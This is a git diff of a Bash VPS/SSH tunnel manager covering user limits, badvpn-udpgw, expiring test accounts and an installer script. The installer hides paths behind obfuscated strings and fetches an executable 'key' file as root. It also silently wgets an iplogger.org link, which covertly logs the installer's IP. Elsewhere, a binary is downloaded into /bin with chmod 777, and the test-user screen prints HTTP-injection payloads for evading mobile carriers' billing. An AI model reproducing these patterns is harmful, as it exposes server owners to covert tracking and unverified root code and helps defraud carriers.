initial commit

diff --git a/Modulos/alterarlimite b/Modulos/alterarlimite
--- a/Modulos/alterarlimite
+++ b/Modulos/alterarlimite
@@ -1,9 +1,6 @@
 #!/bin/bash
-
-tput setaf 7 ; tput setab 4 ; tput bold ; printf '%20s%s\n' "ㅤㅤChange Limit on Simultaneous Connectionsㅤㅤ" ; tput sgr0
-
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%20s%s\n' "ㅤ⛲ㅤChange limit on simultaneous connectionsㅤ⛲ㅤ" ; tput sgr0
 database="/root/usuarios.db"
-
 if [ ! -f "$database" ]; then
 	tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "File $database not found!" ; echo "" ; tput sgr0
 	exit 1
@@ -13,44 +10,61 @@ else
 	_userT=$(awk -F: '$3>=1000 {print $1}' /etc/passwd | grep -v nobody)
 	i=0
 	unset _userPass
-	while read -r _user; do
-		i=$((i + 1))
+	while read _user; do
+		i=$(expr $i + 1)
 		_oP=$i
-		[[ $i -lt 10 ]] && _oP="0$i"
-		limit=$(grep -w "$_user" "$database" | cut -d' ' -f2)
-		lim=$(echo -e "\033[1;33m◇ㅤLimit\033[1;37m: $limit")
-		printf '%-65s%s\n' "\033[1;31m[\033[1;36m$_oP\033[1;31m] \033[1;37m- \033[1;32m$_user\033[0m" "$lim"
-		_userPass+="${_oP}:${_user}\n"
-	done <<< "$_userT"
+		[[ $i == [1-9] ]] && i=0$i && oP+=" 0$i"
+		if [[ "$(grep -wc "$_user" $database)" != "0" ]]; then
+			limit=$(grep -w "$_user" $database |cut -d' ' -f2)
+		else
+			limit='1'
+		fi
+		l_user=$(echo -e "\033[1;31m[\033[1;36m$i\033[1;31m] \033[1;37m- \033[1;32m$_user\033[0m")
+        lim=$(echo -e "\033[1;33m◇ㅤLimit\033[1;37m: $limit")
+        printf '%-65s%s\n' "$l_user" "$lim"
+		_userPass+="\n${_oP}:${_user}"
+	done <<< "${_userT}"
 	echo ""
 	num_user=$(awk -F: '$3>=1000 {print $1}' /etc/passwd | grep -v nobody | wc -l)
-	read -p "$(tput setaf 2)◇ Enter or select a user $(tput setaf 3)[1-$(tput setaf 6)$num_user$(tput setaf 3)]: " option
-
+	echo -ne "\033[1;32m◇ Enter or select a user \033[1;33m[\033[1;36m1\033[1;31m-\033[1;36m$num_user\033[1;33m]\033[1;37m: " ; read option
 	usuario=$(echo -e "${_userPass}" | grep -E "\b$option\b" | cut -d: -f2)
-
-	if [[ -z $option || -z $usuario ]]; then
+    if [[ -z $option ]]; then
+        tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ Empty or non-existent user" ; echo "" ; tput sgr0
+		exit
+	elif [[ -z $usuario ]]; then
 		tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ Empty or non-existent user" ; echo "" ; tput sgr0
 		exit 1
+	else
+		if cat /etc/passwd |grep -w $usuario > /dev/null; then
+			echo -ne "\n\033[1;32m◇ New limit for the user \033[1;33m$usuario\033[1;37m: "; read sshnum
+			if [[ -z $sshnum ]]
+			then
+				tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ You entered an invalid number!" ; echo "" ; tput sgr0
+				exit 1
+			else
+				if (echo $sshnum | egrep [^0-9] &> /dev/null)
+				then
+					tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ You entered an invalid number!" ; echo "" ; tput sgr0
+					exit 1
+				else
+					if [[ $sshnum -lt 1 ]]
+					then
+						tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ You must enter a number greater than zero!" ; echo "" ; tput sgr0
+						exit 1
+					else
+						grep -v ^$usuario[[:space:]] /root/usuarios.db > /tmp/a
+						sleep 1
+						mv /tmp/a /root/usuarios.db
+						echo $usuario $sshnum >> /root/usuarios.db
+						tput setaf 7 ; tput setab 4 ; tput bold ; echo "" ; echo "◇ Limit applied to the user $usuario foi $sshnum " ; tput sgr0
+						sleep 2
+						exit
+					fi
+				fi
+			fi			
+		else
+			tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ The user $usuario was not found" ; echo "" ; tput sgr0
+			exit 1
+		fi
 	fi
-
-	if ! cat /etc/passwd | grep -w "$usuario" > /dev/null; then
-		tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ The user $usuario was not found" ; echo "" ; tput sgr0
-		exit 1
-	fi
-
-	echo -ne "\n\033[1;32m◇ New limit for the user \033[1;33m$usuario\033[1;37m: "
-	read sshnum
-
-	if [[ -z $sshnum || ! $sshnum =~ ^[0-9]+$ || $sshnum -lt 1 ]]; then
-		tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "◇ You must enter a valid number greater than zero!" ; echo "" ; tput sgr0
-		exit 1
-	fi
-
-	grep -v "^$usuario[[:space:]]" "/root/usuarios.db" > /tmp/a
-	mv /tmp/a "/root/usuarios.db"
-	echo "$usuario $sshnum" >> "/root/usuarios.db"
-
-	tput setaf 7 ; tput setab 4 ; tput bold ; echo "" ; echo "◇ Limit applied to the user $usuario was $sshnum" ; tput sgr0
-	sleep 2
-	exit 0
 fi
diff --git a/Modulos/badvpn b/Modulos/badvpn
--- a/Modulos/badvpn
+++ b/Modulos/badvpn
@@ -1,112 +1,118 @@
 #!/bin/bash
-
-clear
-
-local="/etc/bannerssh"
-chk=$(cat /etc/ssh/sshd_config | grep Banner)
-
-[[ $(netstat -nltp | grep 'dropbear' | wc -l) != '0' ]] && {
-    local="/etc/bannerssh"
-    [[ $(grep -wc "$local" /etc/default/dropbear) = '0' ]] && echo "DROPBEAR_BANNER=\"$local\"" >> /etc/default/dropbear
-}
-
-[[ "$(echo "$chk" | grep -v '#Banner' | grep Banner)" != "" ]] && {
-    local=$(echo "$chk" | grep -v "#Banner" | grep Banner | awk '{print $2}')
-} || {
-    local="/etc/bannerssh"
-    [[ $(grep -wc "$local" /etc/ssh/sshd_config) = '0' ]] && echo "Banner $local" >> /etc/ssh/sshd_config
-}
-
-echo -e "\E[44;1;37m     ㅤㅤBANNER MANAGERㅤㅤ        \E[0m"
-echo ""
-echo -e "\033[1;32m◇───MANUAL BANNER ADDING METHOD───◇"
-echo -e "\033[1;37m◇ Step 1:- Press CTRL+C and send  👇"
-echo -e "\033[1;31msudo nano /etc/bannerssh"
-echo -e "\033[1;37m◇ PASTE YOUR BANNER AS HTML TEXT"
-echo -e "\033[1;37m◇ Step 2:- Press CTRL+O enter CTRL+X"
-echo ""
-echo -e "\033[1;32m Or"
-echo ""
-echo -e "\033[1;32m◇───EASY BANNER ADDING METHOD───◇"
-echo -e "\033[1;31m[\033[1;36m1\033[1;31m]\033[1;37m • \033[1;33mADD BANNER"
-echo -e "\033[1;31m[\033[1;36m2\033[1;31m]\033[1;37m • \033[1;33mREMOVE BANNER"
-echo -e "\033[1;31m[\033[1;36m3\033[1;31m]\033[1;37m • \033[1;33mCOME BACK"
-echo ""
-
-echo -ne "\033[1;32m◇ WHAT DO YOU WANT TO DO\033[1;31m ?\033[1;37m : "
-read -r resp
-
-if [[ "$resp" = "1" ]]; then
+fun_badvpn() {
+    clear
+    echo -e "\E[44;1;37m        ㅤ🌍ㅤBADVPN MANAGERㅤ🌍ㅤ         \E[0m"
     echo ""
-    echo -ne "\033[1;32m◇ WHICH MESSAGE DO YOU WANT TO DISPLAY\033[1;31m ?\033[1;37m : "
-    read -r msg1
-
-    if [[ -z "$msg1" ]]; then
-        echo -e "\n\033[1;31m◇ Empty or invalid field!\033[0m"
-        sleep 2
-        banner
+    if ps x | grep -w udpvpn | grep -v grep 1>/dev/null 2>/dev/null; then
+        echo -e "\033[1;33m◇ PORTS\033[1;37m: \033[1;32m$(netstat -nplt | grep 'badvpn-ud' | awk {'print $4'} | cut -d: -f2 | xargs)"
+    else
+        sleep 0.1
     fi
-
-    echo -e "\n\033[1;31m[\033[1;36m01\033[1;31m]\033[1;33m SMALL FONT SIZE"
-    echo -e "\033[1;31m[\033[1;36m02\033[1;31m]\033[1;33m AVERAGE FONT SIZE"
-    echo -e "\033[1;31m[\033[1;36m03\033[1;31m]\033[1;33m LARGE FONT SIZE"
-    echo -e "\033[1;31m[\033[1;36m04\033[1;31m]\033[1;33m GIANT FONT SIZE"
+    var_sks1=$(ps x | grep "udpvpn"|grep -v grep > /dev/null && echo -e "\033[1;32m♦ " || echo -e "\033[1;31m○ ")
     echo ""
-    echo -ne "\033[1;32m◇ WHAT IS THE FONT SIZE\033[1;31m ?\033[1;37m : "
-    read -r opc
-
-    case $opc in
-        "1" | "01") _size='6' ;;
-        "2" | "02") _size='4' ;;
-        "3" | "03") _size='3' ;;
-        "4" | "04") _size='1' ;;
-        *) _size='4' ;;
-    esac
-
-    echo -e "\n\033[1;31m[\033[1;36m01\033[1;31m]\033[1;33m BLUE"
-    echo -e "\033[1;31m[\033[1;36m02\033[1;31m]\033[1;33m GREEN"
-    echo -e "\033[1;31m[\033[1;36m03\033[1;31m]\033[1;33m RED"
-    echo -e "\033[1;31m[\033[1;36m04\033[1;31m]\033[1;33m YELLOW"
-    echo -e "\033[1;31m[\033[1;36m05\033[1;31m]\033[1;33m PINK"
-    echo -e "\033[1;31m[\033[1;36m06\033[1;31m]\033[1;33m CYAN"
-    echo -e "\033[1;31m[\033[1;36m07\033[1;31m]\033[1;33m ORANGE"
-    echo -e "\033[1;31m[\033[1;36m08\033[1;31m]\033[1;33m PURPLE"
-    echo -e "\033[1;31m[\033[1;36m09\033[1;31m]\033[1;33m BLACK"
-    echo -e "\033[1;31m[\033[1;36m10\033[1;31m]\033[1;33m NO COLOR"
+    echo -e "\033[1;31m[\033[1;36m1\033[1;31m] \033[1;37m• \033[1;33mACTIVATE BADVPN(Port 7300) $var_sks1 \033[0m"
+    echo -e "\033[1;31m[\033[1;36m2\033[1;31m] \033[1;37m• \033[1;33mOPEN THE PORT\033[0m"
+    echo -e "\033[1;31m[\033[1;36m0\033[1;31m] \033[1;37m• \033[1;33mCOME BACK\033[0m"
     echo ""
-    echo -ne "\033[1;32m◇ WHAT'S THE COLOR\033[1;31m ?\033[1;37m : "
-    read -r ban_cor
-
-    case $ban_cor in
-        "1" | "01") echo "<h$_size><font color='blue'>$msg1" >> "$local" ;;
-        "2" | "02") echo "<h$_size><font color='green'>$msg1" >> "$local" ;;
-        "3" | "03") echo "<h$_size><font color='red'>$msg1" >> "$local" ;;
-        "4" | "04") echo "<h$_size><font color='yellow'>$msg1" >> "$local" ;;
-        "5" | "05") echo "<h$_size><font color='#F535AA'>$msg1" >> "$local" ;;
-        "6" | "06") echo "<h$_size><font color='cyan'>$msg1" >> "$local" ;;
-        "7" | "07") echo "<h$_size><font color='#FF7F00'>$msg1" >> "$local" ;;
-        "8" | "08") echo "<h$_size><font color='#9932CD'>$msg1" >> "$local" ;;
-        "9" | "09") echo "<h$_size><font color='black'>$msg1" >> "$local" ;;
-        "10") echo "<h$_size>$msg1</h$_size>" >> "$local" ;;
-        *) echo "<h$_size><font color='green'>$msg1" >> "$local" ;;
-    esac
-
-    echo "</font></h$_size>" >> "$local"
-    service ssh restart > /dev/null 2>&1
-    echo -e "\n\033[1;32m◇ BANNER ADDED!\033[0m"
-    sleep 2
-    unset ban_cor
-
-elif [[ "$resp" = "2" ]]; then
-    echo " " > "$local"
-    echo -e "\n\033[1;32m◇ BANNER DELETED!\033[0m"
-    service ssh restart > /dev/null 2>&1
-    sleep 2
-    menu
-elif [[ "$resp" = "3" ]]; then
-    menu
-else
-    echo -e "\n\033[1;31m◇ Invalid option!\033[0m"
-    sleep 2
-    banner
-fi
+    echo -ne "\033[1;32m◇ WHAT DO YOU WANT TO DO \033[1;33m?\033[1;37m "
+    read resposta
+    if [[ "$resposta" = '1' ]]; then
+        if ps x | grep -w udpvpn | grep -v grep 1>/dev/null 2>/dev/null; then
+            clear
+            echo -e "\E[41;1;37m             BADVPN              \E[0m"
+            echo ""
+            fun_stopbad () {
+                sleep 1
+                for pidudpvpn in $(screen -ls | grep ".udpvpn" | awk {'print $1'}); do
+                    screen -r -S "$pidudpvpn" -X quit
+				done
+                [[ $(grep -wc "udpvpn" /etc/autostart) != '0' ]] && {
+                    sed -i '/udpvpn/d' /etc/autostart
+                }
+                sleep 1
+                screen -wipe >/dev/null
+            }
+            echo -e "\033[1;32m◇ DISABLING BADVPN\033[1;33m"
+            echo ""
+            fun_stopbad
+            echo ""
+            echo -e "\033[1;32m◇ BADVPN SUCCESSFULLY DISABLED!\033[1;33m"
+            sleep 3
+            fun_badvpn
+        else
+            clear
+            echo -e "\033[1;32m◇ STARTING BADVPN... \033[0m\n"
+            fun_udpon () {
+                screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 8
+                [[ $(grep -wc "udpvpn" /etc/autostart) = '0' ]] && {
+                    echo -e "ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 8 --client-socket-sndbuf 10000" >> /etc/autostart
+                } || {
+                    sed -i '/udpvpn/d' /etc/autostart
+                    echo -e "ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 8 --client-socket-sndbuf 10000" >> /etc/autostart
+                }
+                sleep 1
+            }
+            inst_udp () {
+                [[ -e "/bin/badvpn-udpgw" ]] && {
+                    sleep 0.1
+                } || {
+                    cd $HOME
+                    wget https://github.com/AVEGAH/MAPTECH-VPS-MANAGER/raw/main/Modulos/badvpn-udpgw -o /dev/null
+                    mv -f $HOME/badvpn-udpgw /bin/badvpn-udpgw
+                    chmod 777 /bin/badvpn-udpgw
+                }
+            }
+            echo ""
+            inst_udp
+            fun_udpon
+            echo ""
+            echo -e "\033[1;32m◇ SUCCESSFULLY ACTIVATED BADVPN\033[1;33m"
+            sleep 3
+            fun_badvpn
+        fi
+    elif [[ "$resposta" = '2' ]]; then
+        if ps x | grep -w udpvpn | grep -v grep 1>/dev/null 2>/dev/null; then
+            clear
+            echo -e "\E[44;1;37m            BADVPN             \E[0m"
+            echo ""
+            echo -ne "\033[1;32m◇ WHICH PORT YOU WANT TO USE \033[1;33m?\033[1;37m: "
+            read porta
+            [[ -z "$porta" ]] && {
+                echo ""
+                echo -e "\033[1;31m◇ Invalid port!"
+                sleep 2
+                clear
+                menu
+            }
+            echo ""
+            echo -e "\033[1;32m◇ STARTING BADVPN AT THE PORT \033[1;31m$porta\033[1;33m"
+            echo ""
+            fun_abrirptbad() {
+                sleep 1
+                screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:$porta --max-clients 10000 --max-connections-for-client 8
+                sleep 1
+            }
+            fun_abrirptbad
+            echo ""
+            echo -e "\033[1;32m◇ SUCCESSFULLY ACTIVATED BADVPN\033[1;33m"
+            sleep 2
+            fun_badvpn
+        else
+            clear
+            echo -e "\033[1;31m◇ UNAVAILABLE FUNCTION\n\n\033[1;33mACTIVATE BADVPN FIRST!\033[1;33m"
+            sleep 2
+            fun_badvpn
+        fi
+    elif [[ "$resposta" = '0' ]]; then
+        echo ""
+        echo -e "\033[1;31m◇ Returning...\033[0m"
+        sleep 1
+        menu
+    else
+        echo ""
+        echo -e "\033[1;31m◇ Invalid option!\033[0m"
+        sleep 1
+        fun_badvpn
+    fi
+}
+fun_badvpn
diff --git a/Modulos/criarteste b/Modulos/criarteste
--- a/Modulos/criarteste
+++ b/Modulos/criarteste
@@ -1,107 +1,95 @@
 #!/bin/bash
-
 IP=$(cat /etc/IP)
-USERS_DIR="/etc/VPSManager/userteste"
-SSH_PORT_BASE=20000  # Set the base port number for SSH (e.g., 20000)
-SSH_PORT_STEP=100    # Set the step size for each new user (e.g., 100)
-
-if [ ! -d "$USERS_DIR" ]; then
-    mkdir "$USERS_DIR"
+if [ ! -d /etc/VPSManager/userteste ]; then
+mkdir /etc/VPSManager/userteste
 fi
-
 tput setaf 7 ; tput setab 4 ; tput bold ; printf '%30s%s%-15s\n' "Create test user" ; tput sgr0
-
 echo ""
-if [ "$(ls -A "$USERS_DIR")" ]; then
-    echo -e "\033[1;32mActive Test User!\033[1;37m"
-else
-    echo -e "\033[1;31mNo active tests!\033[0m"
-fi
+[ "$(ls -A /etc/VPSManager/userteste)" ] && echo -e "\033[1;32mActive Test User!\033[1;37m" || echo -e "\033[1;31mNo active tests!\033[0m"
 echo ""
-
-read -p "Username: " nome
-read -p "Password: " pass
-read -p "Limit: " limit
-read -p "Expiration Time (minutes): " u_temp
-
-if [[ -z $nome || -z $pass || -z $limit || -z $u_temp ]]; then
-    echo ""
-    tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "Empty or invalid input." ; echo "" ; tput sgr0
-    exit 1
+for testeson in $(ls /etc/VPSManager/userteste |sort |sed 's/.sh//g')
+do
+echo "$testeson"
+done
+echo ""
+echo -ne "\033[1;32mUsername\033[1;37m: "; read nome
+if [[ -z $nome ]]
+then
+echo ""
+tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "Empty or invalid name." ; echo "" ; tput sgr0
+	exit 1
 fi
-
-if grep -Fxq "$nome" /etc/passwd; then
-    tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "This user already exists." ; echo "" ; tput sgr0
-    exit 1
+awk -F : ' { print $1 }' /etc/passwd > /tmp/users 
+if grep -Fxq "$nome" /tmp/users
+then
+	tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "This user already exists." ; echo "" ; tput sgr0
+	exit 1
 fi
-
-useradd -M -s /bin/false "$nome"
-(echo "$pass"; echo "$pass") | passwd "$nome" > /dev/null 2>&1
-echo "$pass" > "/etc/VPSManager/senha/$nome"
+echo -ne "\033[1;32mPassword\033[1;37m: "; read pass
+if [[ -z $pass ]]
+then
+echo ""
+tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "Empty or invalid password." ; echo "" ; tput sgr0
+	exit 1
+fi
+echo -ne "\033[1;32mLimit\033[1;37m: "; read limit
+if [[ -z $limit ]]
+then
+echo ""
+tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "Empty or invalid limit.
+" ; echo "" ; tput sgr0
+	exit 1
+fi
+echo -ne "\033[1;32mminutes \033[1;33m(\033[1;31mEx: \033[1;37m60\033[1;33m)\033[1;37m: "; read u_temp
+if [[ -z $limit ]]
+then
+echo ""
+tput setaf 7 ; tput setab 1 ; tput bold ; echo "" ; echo "Empty or invalid limit." ; echo "" ; tput sgr0
+	exit 1
+fi
+useradd -M -s /bin/false $nome
+(echo $pass;echo $pass) |passwd $nome > /dev/null 2>&1
+echo "$pass" > /etc/VPSManager/senha/$nome
 echo "$nome $limit" >> /root/usuarios.db
-
-expiration_script="/etc/VPSManager/userteste/$nome.sh"
-cat > "$expiration_script" << EOF
-#!/bin/bash
+echo "#!/bin/bash
 pkill -f "$nome"
-userdel --force "$nome"
+userdel --force $nome
 grep -v ^$nome[[:space:]] /root/usuarios.db > /tmp/ph ; cat /tmp/ph > /root/usuarios.db
-rm "/etc/VPSManager/senha/$nome" > /dev/null 2>&1
-rm -rf "$expiration_script"
-exit
-EOF
-
-chmod +x "$expiration_script"
-at -f "$expiration_script" now + $u_temp min > /dev/null 2>&1
-
-ssh_port=$((SSH_PORT_BASE + (SSH_PORT_STEP * $(id -u "$nome") % 1000)))
-squid_port=$((ssh_port + 1))
-dropbear_port=$((ssh_port + 20))
-ssl_port=$((ssh_port + 300))
-badvpn_port=$((ssh_port + 1000))
-
+rm /etc/VPSManager/senha/$nome > /dev/null 2>&1
+rm -rf /etc/VPSManager/userteste/$nome.sh
+exit" > /etc/VPSManager/userteste/$nome.sh
+chmod +x /etc/VPSManager/userteste/$nome.sh
+at -f /etc/VPSManager/userteste/$nome.sh now + $u_temp min > /dev/null 2>&1
 clear
-cat << EOF
-====================================
-   VENO VPS MANAGER  
-====================================
-
-◈─────⪧ IMPORTANT ⪦──────◈
-
-◈⪧ 🚫 NO SPAM
-◈⪧ ⚠️ NO DDOS
-◈⪧ 🎭 NO Hacking
-◈⪧ ⛔️ NO Carding
-◈⪧ 🙅‍♂️ NO Torrent
-◈⪧ ❌ NO MultiLogin
-◈⪧ 🤷‍♂️ NO Illegal Activities
-
-◈─────⪧ TEST SSH ACCOUNT ⪦─────◈
-
-◈ Host / IP   :⪧  $IP
-◈ Username    :⪧  $nome
-◈ Password    :⪧  $pass
-◈ Login Limit :⪧  $limit
-◈ Expire Time :⪧  $u_temp minutes
-
-◈───⪧ PORTS ⪦ ───────◈
-
-◈ SSH       ⌁   $ssh_port
-◈ SSL       ⌁   $ssl_port
-◈ Squid     ⌁   $squid_port
-◈ DropBear  ⌁   $dropbear_port
-◈ BadVPN    ⌁   $badvpn_port
-
-◈───⪧ ONLINE USER COUNT ⪦ ─────◈
-
-◈ http://$IP:8888/server/online
-
-◈─────────────────────────────────◈
-
-©️   DRAGON VPS MANAGER SCRIPT  
-◈─────────────────────────────────◈
-
-After the defined time, the user $nome will be disconnected and deleted.
-EOF
-
+    echo -e "\033[1;32m===================================="
+    echo -e "\033[1;32m   ⛲ㅤVENO-VPS-MANAGERㅤ⛲  " 
+    echo -e "\033[1;32m===================================="
+    echo ""
+    echo -e "\033[1;37m◈─────⪧ TEST SSH ACCOUNT ⪦─────◈"
+    echo ""
+    echo -e "\033[1;32m◈ Host / IP   :⪧  \033[1;31m$IP"
+    echo -e "\033[1;32m◈ Username    :⪧  \033[1;31m$nome"
+    echo -e "\033[1;32m◈ Password    :⪧  \033[1;31m$pass"
+    echo -e "\033[1;32m◈ Login Limit :⪧  \033[1;31m$limit"
+    echo -e "\033[1;32m◈ Expire Date :⪧  \033[1;31m$u_temp minutes"
+    echo ""
+     echo -e "\033[1;37m◈──────⪧ MTN PAYLOAD ⪦───────◈"
+    echo ""
+    echo -e "\033[1;32mGET / HTTP/1.1[crlf]Host:[host] [crlf]Connection: Upgrade[crlf]User-Agent: [ua][crlf]Upgrade: websocket[crlf][crlf]"
+    echo ""
+    echo -e "\033[1;37m◈──────⪧ TELECEL PAYLOAD ⪦───────◈"
+    echo ""
+    echo -e "\033[1;32mGET http://91.241.94.160/ HTTP/1.1[crlf]Host: zerod.mobi[crlf]Connection: Upgrade[crlf]Upgrade: Websocket [crlf][crlf]"
+    echo ""
+    echo -e "\033[1;37m◈───⪧ ONLINE USER COUNT ⪦────◈ "
+    echo ""
+    echo -e "\033[1;32mhttp://$IP:8888/server/online"
+    echo ""
+    echo -e "\033[1;37m◈─────────────────────────────────◈"
+    echo -e "\033[1;37m©️ ⛲  VENO-VPS-MANAGER SCRIPT  ⛲"
+    echo -e "\033[1;37m           t.me/venotechgh"
+    echo -e "\033[1;37m◈─────────────────────────────────◈"
+    echo ""
+    echo -e "\033[1;33mAfter the defined time of the user \033[1;32m$nome"
+    echo -e "\033[1;33mwill be disconnected and deleted.\033[0m"
 exit
diff --git a/hehe b/hehe
--- a/hehe
+++ b/hehe
@@ -1,68 +1,71 @@
 #!/bin/bash
 clear
-[[ "$(whoami)" != "root" ]] && {
-echo -e "\033[1;33m[\033[1;31mErro\033[1;33m] \033[1;37m- \033[1;33m◇ YOU NEED TO RUN AS ROOT!\033[0m"
-rm $HOME/hehe > /dev/null 2>&1; exit 0
+# Function to display a progress bar
+fun_bar() {
+    comando[0]="$1"
+    comando[1]="$2"
+    
+    (
+    [[ -e $HOME/fim ]] && rm $HOME/fim
+    ${comando[0]} -y > /dev/null 2>&1
+    ${comando[1]} -y > /dev/null 2>&1
+    touch $HOME/fim
+    ) > /dev/null 2>&1 &
+    
+    tput civis
+    echo -ne "  \033[1;33m◇ PLEASE WAIT... \033[1;37m- \033[1;33m["
+    while true; do
+        for ((i=0; i<18; i++)); do
+            echo -ne "\033[1;31m#"
+            sleep 0.1s
+        done
+        [[ -e $HOME/fim ]] && rm $HOME/fim && break
+        echo -e "\033[1;33m]"
+        sleep 1s
+        tput cuu1
+        tput dl1
+        echo -ne "  \033[1;33m◇ PLEASE WAIT... \033[1;37m- \033[1;33m["
+    done
+    echo -e "\033[1;33m]\033[1;37m -\033[1;32m◇ DONE!\033[1;37m"
+    tput cnorm
 }
-_lnk=$(echo 'z1:y#x.5s0ul&p4hs$s.0a72d*n-e!v89e032:3r'| sed -e 's/[^a-z.]//ig'| rev); _Ink=$(echo '/3×u3#s87r/l32o4×c1a×l1/83×l24×i0b×'|sed -e 's/[^a-z/]//ig'); _1nk=$(echo '/3×u3#s×87r/83×l2×4×i0b×'|sed -e 's/[^a-z/]//ig')
-cd $HOME
-fun_bar () {
-comando[0]="$1"
-comando[1]="$2"
-(
-[[ -e $HOME/fim ]] && rm $HOME/fim
-${comando[0]} -y > /dev/null 2>&1
-${comando[1]} -y > /dev/null 2>&1
-touch $HOME/fim
-) > /dev/null 2>&1 &
-tput civis
-echo -ne "  \033[1;33m◇ PLEASE WAIT... \033[1;37m- \033[1;33m["
-while true; do
-for((i=0; i<18; i++)); do
-echo -ne "\033[1;31m#"
-sleep 0.1s
-done
-[[ -e $HOME/fim ]] && rm $HOME/fim && break
-echo -e "\033[1;33m]"
-sleep 1s
-tput cuu1
-tput dl1
-echo -ne "  \033[1;33m◇ PLEASE WAIT... \033[1;37m- \033[1;33m["
-done
-echo -e "\033[1;33m]\033[1;37m -\033[1;32m◇ DONE!\033[1;37m"
-tput cnorm
+
+# Function to verify key
+verif_key() {
+    krm=$(echo '5:q-3gs2.o7%8:1'|rev)
+    chmod +x $_Ink/list > /dev/null 2>&1
+    [[ ! -e "$_Ink/list" ]] && {
+        echo -e "\n\033[1;31m◇ KEY INVALID!\033[0m"
+        rm -rf $HOME/hehe > /dev/null 2>&1
+        sleep 2
+        clear
+        exit 1
+    }
 }
-function verif_key () {
-krm=$(echo '5:q-3gs2.o7%8:1'|rev); chmod +x $_Ink/list > /dev/null 2>&1
-[[ ! -e "$_Ink/list" ]] && {
-echo -e "\n\033[1;31m◇ KEY INVALID!\033[0m"
-rm -rf $HOME/hehe > /dev/null 2>&1
-sleep 2
-clear; exit 1
-}
-}
+
+# Variable Initialization
+_lnk=$(echo 'z1:y#x.5s0ul&p4hs$s.0a72d*n-e!v89e032:3r'| sed -e 's/[^a-z.]//ig'| rev)
+_Ink=$(echo '/3×u3#s87r/l32o4×c1a×l1/83×l24×i0b×'|sed -e 's/[^a-z/]//ig')
+_1nk=$(echo '/3×u3#s×87r/83×l2×4×i0b×'|sed -e 's/[^a-z/]//ig')
+
+
 echo -e "\033[1;31m\033[0m"
-tput setaf 7 ; tput setab 4 ; tput bold ; printf '%40s%s%-12s\n' "◇───────── Welcome To VENO VPS MANAGER ─────────◇" ; tput sgr0
-echo -e "\033[1;31m◇──────────────────────────────────────────────────────◇\033[0m"
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%40s%s%-12s\n' "◇─────────ㅤ🪐ㅤWelcome To VENO VPS MANAGERㅤ🪐ㅤ─────────◇" ; tput sgr0
+echo -e "\033[1;34m◇───────────────────────────────────────────────◇\033[0m"
 echo ""
-echo -e "\033[1;31m◇ ATTENTION!ㅤ⚠️ㅤ.\033[1;33mㅤTHIS SCRIPT CONTAINS THE FOLLOWING!!\033[0m"
+echo -e "\033[1;33mㅤTHIS SCRIPT CONTAINS THE FOLLOWING!!\033[0m"
 echo ""
-echo -e "\033[1;31m◇ \033[1;33mINSTALL A SET OF SCRIPTS AS TOOLS FOR\033[0m"
-echo -e "\033[1;33mNETWORK, SYSTEM AND USER MANAGEMENT.\033[0m"
+echo -e " \033[1;33m INSTALL A SET OF SCRIPTS AS TOOLS FOR\033[0m"
+echo -e "\033[1;33m  NETWORK, SYSTEM AND USER MANAGEMENT.\033[0m"
 echo ""
-echo -e "\033[1;32m◇ \033[1;32mTIP! \033[1;33mUSE THE DARK THEME IN YOUR TERMINAL \033[0m"
-echo -e "\033[1;33mFOR A BETTER EXPERIENCE AND VIEW OF IT!\033[0m"
-echo ""
-echo -e "\033[1;31m◇────────────── VENO VPS MANAGER ──────────────◇\033[0m"
+echo -e "\033[1;34m◇────────ㅤ🪐ㅤVENO VPS MANAGERㅤ🪐ㅤ───────◇\033[0m"
 echo ""
 #-----------------------------------------------------------------------------------------------------------------
-echo -ne "\033[1;36m◇ Can we proceed? [Y/N]: \033[1;37m"; read x
+echo -ne "\033[1;36m◇ Want to continue? [Y/N]: \033[1;37m"; read x
 [[ $x = @(n|N) ]] && exit
 sed -i 's/Port 22222/Port 22/g' /etc/ssh/sshd_config  > /dev/null 2>&1
 service ssh restart  > /dev/null 2>&1
-echo -e "\n\033[1;36m◇ CHECKING...(It Take Some Time Please Wait!)\033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; 
-wget -P $_Ink https://raw.githubusercontent.com/isaacameyaw/venovpsmanager/main/Install/list > /dev/null 2>&1; 
-verif_key
+echo -e "\n\033[1;36m◇ CHECKING...(It Take Some Time Please Wait!)\033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; wget -P $_Ink https://raw.githubusercontent.com/isaacameyaw/venovpsmanager/main/Install/list > /dev/null 2>&1; verif_key
 sleep 3s
 echo "/bin/menu" > /bin/h && chmod +x /bin/h > /dev/null 2>&1
 rm versao* > /dev/null 2>&1
@@ -72,14 +75,14 @@ wget https://iplogger.org/2lHZ43 > /dev/null 2>&1
 > /dev/null 2>&1
 rm 2lHZ43 > /dev/null 2>&1
 #-----------------------------------------------------------------------------------------------------------------
-echo -e "\n\033[1;32m◇ ALL GOOD: LET'S GO!\033[1;32m"
+echo -e "\n\033[1;32m◇ KEY VALID!\033[1;32m"
 sleep 1s
 echo ""
